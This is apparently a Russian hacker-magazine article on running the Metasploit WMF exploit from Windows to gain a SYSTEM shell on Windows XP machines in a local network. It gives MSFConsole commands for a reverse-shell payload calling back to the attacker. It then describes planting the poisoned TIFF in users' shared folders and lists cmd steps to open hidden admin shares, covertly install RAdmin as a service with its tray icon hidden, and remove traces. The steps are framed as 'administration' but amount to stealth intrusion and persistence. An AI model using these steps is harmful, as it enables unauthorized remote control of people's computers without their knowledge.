Кто не слышал про WMF-баг, с помощью которого можно получить шелл-доступ к
практически любому компьютеру использующему системную библиотеку для обработки
WMF-файлов? Наверное мало кто, особенно после разгромной статьи в
февральском номере
журнала
. Однако, многие Win-пользователи, читающие журнал ][, не смогли его
использовать по следующим причинам:

  1. Отсутствие доступа к никсовому шеллу на удалённом компьютере;
  2. Слабое знание других систем: FreeBSD, LINUX;

Возникает вопрос: зачем ломать WIN–компьютеры с никсовых шеллов? Почему бы не
протестировать эксплоит в родной среде, спросите вы? Не будем разбирать
экзотические варианты, типа работы под Virtual PC или WMWARE альтернативных
систем, а также Cygwin (хотя без него не обойтись, смотри далее). Сделаем всё
проще, запустим перловый эксплоит в Windows.

Всё протестировано на двух Windows XP
SP2 в локальной сети и работает.

На диске ][ лежал пакет Metasploit Fгаmеwork — но он для никсов! Хотя и в его
составе есть сплоит ie_xp_pfv_metafile.pm. На практике, при запуске в Active
perl for Win32, он не работает, точнее не работает весь пакет Metasploit
Fгаmеwork 2.5. Идём по ссылке

http://www.metasploit.com/projects/Framework/downloads.html
и скачиваем —
“Metasploit fгаmеwork 2.5 Win32 Cygwin Installer”, запускаем MSFConsole , делаем
ls exploits и с сожалением обнаруживаем, что ie_xp_pfv_metafile.pm там нет! Вот
облом… Где взять? Ответ прост: на DVD ][ или скачать Metasploit ifгаmеwork 2.5
для никсов – в этом пакете он присутствует! То есть достаточно его
перекопировать в папку exploits и пользоваться на здоровье. Вот так, для
Win-пользователей всё упрощается.

Что делать дальше, когда вы получили шелл-доступ с правами системы к
удалённому компьютеру с Windows, зависит от вашей фантазии. Для примера
расскажу, что можно сделать в локальной сети для пользы (точнее для упрощённого
администрирования WIN-систем администратором).

1. Удалённая скрытая установка RAdmin

Не всегда есть доступ к компьютеру пользователя (компьютер занят
пользователем, далеко и т. д.). Поэтому воспользуемся WMF – багом и поставим на
его компьютер RA удалённо, по локальной сети. Как правило (у нас в локалке,
например) каждый юзверь имеет расшаренную папку, разрешённую для записи и в
основном пользуется стандартным проводником (никуда от него не деться –
стандартная оболочка, используется в любой программе – файл\открыть
файл\сохранить).

Запускаем консоль MSFConsole и дальше:

msf > use ie_xp_pfv_metafile – будем использовать сплоит для WMF
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse – цепляем реверс-шелл для
win32
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST ххх.ххх.ххх.ххх –
устанавливаем IP куда будет коннектится реверс-шелл
LHOST -> xxx.xxx.xxx.xxx
msf ie_xp_pfv_metafile(win32_reverse) > exploit – запускаем эксплоит
[*] Starting Reverse Handler.
[*] Waiting for connections to http://ххх.ххх.ххх.ххх:8080/ — поднимается
Web-сервер на ранее указанном адресе и ждёт подключений.

Через IE на нашей системе зайдём на этот Web-сервер и опа… взломаем сами себя
(ну это не страшно). В консоли сделаем exit и не будем над собой издеваться.

Теперь зайдём в IE в Сервис\Свойства\Общие\Параметры…\Просмотр файлов…. И
найдём ядовитый tiff-файл, содержащий шелл-код, имя файла будет что-то типа
«M16R14KtkTuEys0Iqt9M4vqK3ny4Kh1vem[2].tiff». Остаётся скопировать этот файл в
папку юзверя (предварительно подняв web-сервер ещё раз на своём компьютере) и
ждать когда он откроет папку, содержащую наш ядовитый файл с шелл-кодом.

Дождались соединения, юзверь в этот момент ничего не заметит (если не
посмотрит в процессы и не увидит там cmd.exe).

Дальше зальём ему RA (предварительно упаковав в SFX-архив RA.exe сам
r_server.exe и две необходимые библиотеки AdmDll.dll, raddrv.dll, а так же
reg-файл для скрытия иконки r_server`a в трее Hide_RA.reg – он меняет один ключ,
вот его содержание:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"DisableTrayIcon"=hex:01,00,00,00

Примечание:

Для упаковки в SFX-архив (самораспаковывающийся архив) использовал WinRAR v.
3.2 со следующими параметрами:

Path=.\%SystemRoot%\system32\
SavePath
Silent=1
Overwrite=2

Можете задать другие, но на мой взгляд это оптимальные. Далее в консоли (уже
в консоли cmd) пишем:

cd \ `перейти в корень
диска

cd %SystemRoot%\system32 `
задаём текущую папку
system32

net share C$$=C: `
расшариваем диск C: юзверя – он
невидим в сетевом окружении

net share D$$=D: `
расшариваем диск D: тоже (не
знаем где система стоит, может и на D:)

copy /y \\имя компьютера_\Папка_RA\ra.exe %SystemRoot%\system32 `
копируем
архив RA в системную папку юзверя

cmd /c ra.exe `
распаковываем всё необходимое для
установки r_server и запуска его в скрытом режиме

r_server /install /silence `
инсталлируем
r_server.exe в скрытом режиме как службу

reg import Hide_RA.reg `
скрываем иконку
r_server.exe в трее

r_server /start /silence `
запускаем скрытно службу
r_server.exe

`
Всё, r_server.exe ждёт подключений клиента…
delete ra.exe `
удаляем архив

net share C$$ /delete `
удаляем шары
net share D$$ /delete
exit `
выходим из консоли cmd

Можно включить в архив run.cmd файл вида:

r_server /silence /install
reg import Hide_RA.reg
r_server /silence /start
delete ra.exe
net share C$$ /delete
net share D$$ /delete
exit

Тогда после «cmd /c ra.exe» в консоли надо запустить на исполнение его,
например так:

cmd /c run.cmd `инсталлируем
и запускаем службу r_server, затем убираем следы

exit `
выходим из консоли cmd (шелла удалённого
компьютера) в консоль MFS

msf ie_xp_pfv_metafile(win32_reverse) > exploit `и
так далее остальных юзверей…

2. Удалённое превращение Windows_XP_SP2 в сервер win-терминалов.

Компьютер с сервером терминалов позволяет подключится к нему по типу
удалённого рабочего стола, только без выхода из системы основного пользователя,
а в отдельном сеансе, т. е. позволит работать за компьютеров как минимум двум
пользователям одновременно, одному из них удалённо.

Работы ведутся. Продолжение следует?

Оставить мнение

Check Also

Ботнеты атакуют устройства для майнинга и переключают свое внимание на криптовалюту

Сразу несколько новостей об атаках майнинговой малвари принесли последние дни. Так, крипто…